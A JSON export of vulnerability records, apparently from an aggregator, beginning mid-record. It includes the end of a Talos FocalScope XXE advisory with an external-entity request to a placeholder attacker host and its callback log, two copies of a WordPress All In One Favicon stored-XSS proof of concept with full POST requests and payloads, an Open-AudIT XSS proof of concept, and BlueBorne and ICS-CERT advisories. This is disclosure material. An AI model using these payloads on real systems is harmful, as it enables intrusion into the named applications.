AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\n Content-Type: text/xml; charset=UTF-8\n Accept: /\n DNT: 1\n Accept-Encoding: gzip, deflate\n Accept-Language: en-US,en;q=0.8\n Connection: close\n \n <?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://x.x.x.x/xxe\"> %remote;%int;%trick;]><body><o i='msg'><s i='_url'>url:xlogin.asp</s><s i='_fnc'>GetSalt</s><o i='oParam'><s i='sUser'>PCSL</s><s i='sMyName'>self</s><s i='sCallback'>PutSalt</s></o></o></body>\n \n On the attacking Server the following request can be observed: \n Ncat: Connection from x.x.x.x.\n Ncat: Connection from x.x.x.x.\n GET /xxe HTTP/1.0\n Accept: /\n UA-CPU: AMD64\n User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\n Host: x.x.x.x\n Connection: Keep-Alive\n \n\nNote: It was also observed that pretty much any page which takes XML input in POST request is vulnerable to this vulnerability, regardless of whether pages are protected by authentication or not.\n\n### Timeline\n\n2018-04-09 - Vendor Disclosure \n2018-04-12 - Sent plain text file to vendor \n2018-06-05 - 60 day follow up \n2018-06-27 - Final follow up \n2018-07-20 - Public Release\n\n##### Credit\n\nDiscovered by Yuri K of Security Advisory EMEAR\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0604\n\nPrevious Report\n\nTALOS-2018-0606\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-07-20T00:00:00", "title": "FocalScope XML External Entity Injection Vulnerability", "type": "talos", "enchantments": {"score": {"modified": "2018-07-20T17:04:07", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3881"], "modified": "2018-07-20T00:00:00", "id": "TALOS-2018-0559", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0559", "cvss": {"score": 0.0, "vector": "NONE"}}], "lenovo": [{"lastseen": "2018-07-19T17:41:20", "references": [], "description": "**Lenovo Security Advisory**: LEN-17125\n\n**Potential Impact**: Remote code execution\n\n**Severity**: High\n\n**Scope of Impact**: Industry wide\n\n**CVE Identifier**: CVE-2017-0781, CVE-2017-0782, CVE-2017-0783, CVE-2017-0785, CVE-2017-8628, CVE-2017-14315, CVE-2017-1000250, CVE-2017-1000251\n\n**Summary Description**:\n\nA collection of Bluetooth implementation vulnerabilities known as \"BlueBorne\" have been identified that affect Windows, iOS, and Linux-kernel-based operating systems. In worst case scenarios, these vulnerabilities allow an unauthenticated attacker to perform commands on affected devices.\n\n**Mitigation Strategy for Consumers (what you should do to protect yourself):**\n\nPatches are available in the latest patch releases from Windows (see [Microsoft bulletin](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), iOS, Linux providers, and Android (see [September 2017 security bulletin](<https://source.android.com/security/bulletin/2017-09-01>)).\n\nU.S.-based phone and other mobile device users running Android are advised to regularly check this advisory page. Due to the complexity of the U.S. mobile ecosystem, which typically requires manufacturer and carrier support to push updates, updates are in progress. Users are encouraged to accept updates to their Android device upon receiving notifications to update their operating system.\n\n \nIf an update is not available, affected users should consider disabling Bluetooth on affected devices if Bluetooth is unused or unnecessary.\n\n**Product Impact**:\n", "edition": 7, "reporter": "Lenovo", "published": "2018-07-19T12:31:00", "title": "Bluetooth \u201cBlueBorne\u201d Vulnerabilities - us", "type": "lenovo", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-1000251", "CVE-2017-8628", "CVE-2017-0783", "CVE-2017-14315", "CVE-2017-0782"], "modified": "2018-07-19T12:31:00", "id": "LENOVO:PS500141-NOSID", "href": "https://support.lenovo.com/us/en/product_security/len-17125", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2018-07-20T10:01:14", "references": [], "description": "", "edition": 1, "reporter": "Javier Olmedo", "published": "2018-07-19T00:00:00", "title": "WordPress All In One Favicon 4.6 Cross Site Scripting", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-07-20T10:01:14", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-13832"], "modified": "2018-07-19T00:00:00", "id": "PACKETSTORM:148617", "href": "https://packetstormsecurity.com/files/148617/WordPress-All-In-One-Favicon-4.6-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 - Authenticated Multiple XSS Persistent \n# Date: 2018-07-10 \n# Exploit Author: Javier Olmedo \n \n# Website: https://hackpuntes.com/ \n# Vendor Homepage: http://www.techotronic.de/ \n# Software Link: https://wordpress.org/plugins/all-in-one-favicon/ \n# Version/s: 4.6 and below \n# Patched Version: unpatched \n# CVE : 2018-13832 \n# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099 \n \nPlugin description: \nAll In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation. \n \nDescription: \nWordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute javascript code through XSS Persistent attacks. \n \nTechnical details: \n \nThe following parameters are vulnerable: \nbackendApple-Text \nbackendICO-Text \nbackendPNG-Text \nbackendGIF-Text \nfrontendApple-Text \nfrontendICO-Text \nfrontendPNG-Text \nfrontendGIF-Text \n \nProof of Concept (PoC): \nThe following POST request will cause it to display an alert in the browser when it runs as an authenticated user with permissions: \n \nPOST /wordpress/wp-admin/admin-post.php HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nReferer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php \nContent-Type: multipart/form-data; boundary=---------------------------168911549614148 \nContent-Length: 3407 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n-----------------------------168911549614148 \nContent-Disposition: form-data; name=\"_wpnonce\" \n \n9df031414d \n-----------------------------168911549614148 \nContent-Disposition: form-data; name=\"_wp_http_referer\" \n \n/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php \n-----------------------------168911549614148 \nContent-Disposition: form-data; name=\"option_page\" \n \naio-favicon_settings \n-----------------------------168911549614148 \nContent-Disposition: form-data; name=\"aio-favicon_settings[frontendICO-text]\" \n \n\"><img src=a onerror=alert(1)> \n-----------------------------168911549614148 \nContent-Disposition: form-data; name=\"action\" \n \naioFaviconUpdateSettings \n-----------------------------168911549614148 \nContent-Disposition: form-data; name=\"aioFaviconUpdateSettings\" \n \nGuardar cambios \n-----------------------------168911549614148 \n \nContent-Disposition: form-data; name=\"action\" \n \naioFaviconUpdateSettings \n-----------------------------168911549614148 \nContent-Disposition: form-data; name=\"aio-favicon_settings[removeLinkFromMetaBox]\" \n \ntrue \n-----------------------------168911549614148 \nContent-Disposition: form-data; name=\"action\" \n \naioFaviconUpdateSettings \n-----------------------------168911549614148-- \n \nPayloads: \n\"><img src=a onerror=alert(1)> \n\"><img src=a onerror=alert(String.fromCharCode(88,83,83))> \n \nTimeline: \n15/03/2018 I send the report. (no answer) \n27/05/2018 I send the report, again. (no answer) \n10/07/2018 Public disclosure. \n \nReferences: \nhttps://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/ \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148617/wpallinonefavicon46-xss.txt"}], "exploitdb": [{"lastseen": "2018-07-19T21:14:42", "osvdbidlist": [], "references": [], "description": "WordPress Plugin All In One Favicon 4.6 - Cross-Site Scripting. CVE-2018-13832. Webapps exploit for PHP platform. Tags: Cross-Site Scripting (XSS)", "edition": 2, "reporter": "Exploit-DB", "published": "2018-07-19T00:00:00", "title": "WordPress Plugin All In One Favicon 4.6 - Cross-Site Scripting", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-07-19T21:14:42", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-13832"], "modified": "2018-07-19T00:00:00", "id": "EDB-ID:45056", "href": "https://www.exploit-db.com/exploits/45056/", "sourceData": "# Exploit Title: WordPress Plugin All In One Favicon <= 4.6 - Authenticated Multiple XSS Persistent\r\n# Date: 2018-07-10\r\n# Exploit Author: Javier Olmedo\r\n \r\n# Website: https://hackpuntes.com/\r\n# Vendor Homepage: http://www.techotronic.de/\r\n# Software Link: https://wordpress.org/plugins/all-in-one-favicon/\r\n# Version/s: 4.6 and below\r\n# Patched Version: unpatched\r\n# CVE : 2018-13832\r\n# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099\r\n \r\nPlugin description:\r\nAll In One Favicon adds favicons to your site and your admin pages. You can either use favicons you already uploaded or use the builtin upload mechanism to upload a favicon to your WordPress installation.\r\n \r\nDescription:\r\nWordPress Plugin All In One Favicon before 4.6 allows remote authenticated users to execute javascript code through XSS Persistent attacks.\r\n\r\nTechnical details:\r\n\r\nThe following parameters are vulnerable:\r\nbackendApple-Text\r\nbackendICO-Text\r\nbackendPNG-Text\r\nbackendGIF-Text\r\nfrontendApple-Text\r\nfrontendICO-Text\r\nfrontendPNG-Text\r\nfrontendGIF-Text\r\n \r\nProof of Concept (PoC):\r\nThe following POST request will cause it to display an alert in the browser when it runs as an authenticated user with permissions:\r\n\r\nPOST /wordpress/wp-admin/admin-post.php HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php\r\nContent-Type: multipart/form-data; boundary=---------------------------168911549614148\r\nContent-Length: 3407\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n\r\n-----------------------------168911549614148\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n9df031414d\r\n-----------------------------168911549614148\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php\r\n-----------------------------168911549614148\r\nContent-Disposition: form-data; name=\"option_page\"\r\n\r\naio-favicon_settings\r\n-----------------------------168911549614148\r\nContent-Disposition: form-data; name=\"aio-favicon_settings[frontendICO-text]\"\r\n\r\n\"><img src=a onerror=alert(1)>\r\n-----------------------------168911549614148\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\naioFaviconUpdateSettings\r\n-----------------------------168911549614148\r\nContent-Disposition: form-data; name=\"aioFaviconUpdateSettings\"\r\n\r\nGuardar cambios\r\n-----------------------------168911549614148\r\n\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\naioFaviconUpdateSettings\r\n-----------------------------168911549614148\r\nContent-Disposition: form-data; name=\"aio-favicon_settings[removeLinkFromMetaBox]\"\r\n\r\ntrue\r\n-----------------------------168911549614148\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\naioFaviconUpdateSettings\r\n-----------------------------168911549614148--\r\n\r\nPayloads:\r\n\"><img src=a onerror=alert(1)>\r\n\"><img src=a onerror=alert(String.fromCharCode(88,83,83))>\r\n\r\nTimeline:\r\n15/03/2018 I send the report. (no answer)\r\n27/05/2018 I send the report, again. (no answer)\r\n10/07/2018 Public disclosure.\r\n\r\nReferences:\r\nhttps://hackpuntes.com/cve-2018-13832-wordpress-plugin-all-in-one-favicon-4-6-autenticado-multiples-cross-site-scripting-persistentes/", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45056/"}], "zdt": [{"lastseen": "2018-07-19T12:03:11", "references": [], "description": "Exploit for multiple platform in category web applications", "edition": 1, "reporter": "Ranjeet Jaiswal", "published": "2018-07-19T00:00:00", "title": "Open-AudIT Community 2.1.1 - Cross-Site Scripting Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-07-19T12:03:11", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11124"], "modified": "2018-07-19T00:00:00", "id": "1337DAY-ID-30747", "href": "https://0day.today/exploit/description/30747", "sourceData": "#######################################\r\n# Exploit Title: Open-AudIT Community - 2.1.1 - Cross Site Scripting Vulnerability\r\n# Google Dork:NA\r\n# #######################################\r\n# Exploit Author: Ranjeet Jaiswal#\r\n#######################################\r\n# Vendor Homepage: https://opmantek.com/\r\n# Software Link:http://dl-openaudit.opmantek.com/OAE-Win-x86_64-\r\nrelease_2.2.1.exe\r\n# Affected Version: 2.1.1\r\n# Category: WebApps\r\n# Tested on: Windows 10\r\n# CVE : CVE-2018-11124\r\n#\r\n# 1. Vendor Description:\r\n#\r\n# Network Discovery and Inventory Software | Open-AudIT | Opmantek\r\nDiscover what's on your network\r\nOpen-AudIT is the world's leading network discovery, inventory and audit\r\nprogram. Used by over 10,000 customers.\r\n#\r\n# 2. Technical Description:\r\n#\r\n# Cross-site scripting (XSS) vulnerability in Attributes functionality in\r\nOpen-AudIT Community edition before 2.2.2 allows remote attackers to inject\r\narbitrary web script or HTML via a crafted attribute name of a Attribute,\r\nas demonstrated in below POC.\r\n#\r\n# 3. Proof Of Concept:\r\n \r\n 3.1. Proof of Concept for Injecting html contain\r\n \r\n# #Step to reproduce.\r\nStep1:Login in to Open-Audit\r\nStep2:Go to Attributes page\r\nStep3:Select any attribute which are listed\r\nStep4:click on details tab.\r\nStep5:In the Name field put the following payload and click submit.\r\n \r\n<p>Sorry! We have moved! The new URL is: <a href=\"http://geektyper.com/\">\r\nOpen-Audit</a></p>\r\n \r\nStep6:Go to export tab and export using HTML Table\r\nStep7:When user open download attribute.html file.You will see redirection\r\nhyperlink.\r\nStep8:When user click on link ,User will be redirected to Attacker or\r\nmalicious website.\r\n \r\n 3.2. Proof of Concept for Injecting web script(Cross-site scripting(XSS))\r\n \r\n # #Step to reproduce.\r\nStep1:Login in to Open-Audit\r\nStep2:Go to Attributes page\r\nStep3:Select any attribute which are listed\r\nStep4:click on details tab.\r\nStep5:In the Name field put the following payload and click submit.\r\n \r\n<script>alert(hack)</script>\r\n \r\nStep6:Go to export tab and export using HTML Table\r\nStep7:When user open download attribute.html file.Alert Popup will execute.\r\n \r\n \r\n \r\n# 4. Solution:\r\n#\r\n# Upgrade to latest release of Open-AudIT version\r\n# https://opmantek.com/network-tools-download/open-audit/\n\n# 0day.today [2018-07-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30747"}], "ics": [{"lastseen": "2018-07-19T21:38:33", "references": ["https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-18-200-01 AVEVA InduSoft Web Studio and InTouch Machine Edition&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-200-01&site_name=ICS-CERT", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "https://softwaresupportsp.schneider-electric.com/#/producthub/details?id=5063", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-200-01", "https://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "https://ics-cert.us-cert.gov/", "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-200-01", "https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://urldefense.proofpoint.com/v2/url?u=https-3A__sw.aveva.com_hubfs_assets-2D2018_pdf_security-2Dbulletin_SecurityBulletin-5FLFSec128-28002-29.pdf&d=DwMGaQ&c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00&r=zE5lG3CZZIbdBvT6slVAzQ&m=YHzOx3IxjROa2Y6TDyoej3F3hX3mODG1x0muH-XoFaA&s=yULjWVgHeseMfsZj9PU5fjfvt1zNBSPWyInIQ39XLiE&e=", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-18-200-01 AVEVA InduSoft Web Studio and InTouch Machine Edition&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-200-01&site_name=ICS-CERT", "http://www.us-cert.gov/privacy/", "http://www.indusoft.com/File-Management?Command=Core_Download&EntryId=2074", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10620", "https://cwe.mitre.org/data/definitions/121.html", "https://ics-cert.us-cert.gov/content/recommended-practices", "http://www.dhs.gov", "http://www.dhs.gov/report-cyber-risks", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-18-200-01 AVEVA InduSoft Web Studio and InTouch Machine Edition&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-200-01&site_name=ICS-CERT", "https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-200-01"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION: **Exploitable remotely/low skill level to exploit.\n * **Vendor: **AVEVA Software, LLC (AVEVA)\n * **Equipment: **InduSoft Web Studio and InTouch Machine Edition\n * **Vulnerabilities: **Stack-based buffer overflow\n\n## 2\\. RISK EVALUATION\n\nThe listed products are vulnerable only if the TCP/IP Server Task is enabled. A remote attacker could send a carefully crafted packet during a tag, alarm, or event related action such as read and write, which may allow remote code execution.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of InduSoft Web Studio and InTouch Machine Edition, an HMI, are affected:\n\n * InduSoft Web Studio v8.1 and v8.1SP1, and\n * InTouch Machine Edition v2017 8.1 and v2017 8.1 SP1\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)**\n\nA remote user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. \n\n[CVE-2018-10620](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10620>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Critical Manufacturing, Energy, Transportation Systems, and Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **United Kingdom\n\n### 3.4 RESEARCHER\n\nTenable Research reported this vulnerability to AVEVA and AVEVA reported it to NCCIC.\n\n## 4\\. MITIGATIONS\n\nUsers of InduSoft Web Studio v8.1 SP1 are affected and should apply InduSoft Web Studio Hotfix 81.1.00.08 as soon as possible. Users of InduSoft Web Studio v8.1 are also affected and should first upgrade to InduSoft Web Studio v8.1 SP1 and then apply the hotfix. \n\nUsers of InTouch Machine Edition 2017 v8.1 SP1 are affected and should apply InTouch Machine Edition Hotfix 81.1.00.08 as soon as possible. Users of InTouch Machine Edition 2017 v8.1 are also affected and should first upgrade to InTouch Machine Edition 2017 v8.1 SP1 and then apply the hotfix. \n\nSoftware security updates:\n\n * [http://www.indusoft.com/File-Management?Command=Core_Download&amp;EntryId=2074](<http://www.indusoft.com/File-Management?Command=Core_Download&EntryId=2074>)\n * <https://softwaresupportsp.schneider-electric.com/#/producthub/details?id=5063> (login required)\n\nTo identify which version of InduSoft Web Studio or InTouch Machine Edition you have installed:\n\n * Windows Desktop or Server operating system: Navigate to Windows Programs and Features, locate the \u201cInduSoft Web Studio\u201d or \u201cInTouch Machine Edition\u201d entries to review the displayed installed version.\n * On a Windows Embedded operating system: navigate to the Bin folder in the installation location of InduSoft Web Studio or InTouch Machine Edition and open the file \u201cCEView.ini\u201d. The installed version can be observed from the \u201cversion=*.*.*\u201d attribute within the file.\n\nAVEVA\u2019s security bulletin LFSEC00000128 is available at the following location:\n\n[https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec128(002).pdf ](<https://urldefense.proofpoint.com/v2/url?u=https-3A__sw.aveva.com_hubfs_assets-2D2018_pdf_security-2Dbulletin_SecurityBulletin-5FLFSec128-28002-29.pdf&d=DwMGaQ&c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00&r=zE5lG3CZZIbdBvT6slVAzQ&m=YHzOx3IxjROa2Y6TDyoej3F3hX3mODG1x0muH-XoFaA&s=yULjWVgHeseMfsZj9PU5fjfvt1zNBSPWyInIQ39XLiE&e=>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for [control systems security recommended practices](<https://ics-cert.us-cert.gov/content/recommended-practices>) on the ICS-CERT web page. Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS-CERT website](<https://ics-cert.us-cert.gov/>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n", "edition": 1, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2018-07-19T00:00:00", "title": "AVEVA InduSoft Web Studio and InTouch Machine Edition", "type": "ics", "enchantments": {"score": {"modified": "2018-07-19T21:38:33", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "info", "cvelist": ["CVE-2018-10620"], "modified": "2018-07-19T00:00:00", "id": "ICSA-18-200-01", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-18-200-01", "cvss": {"score": 0.0, "vector": "NONE"}}]}}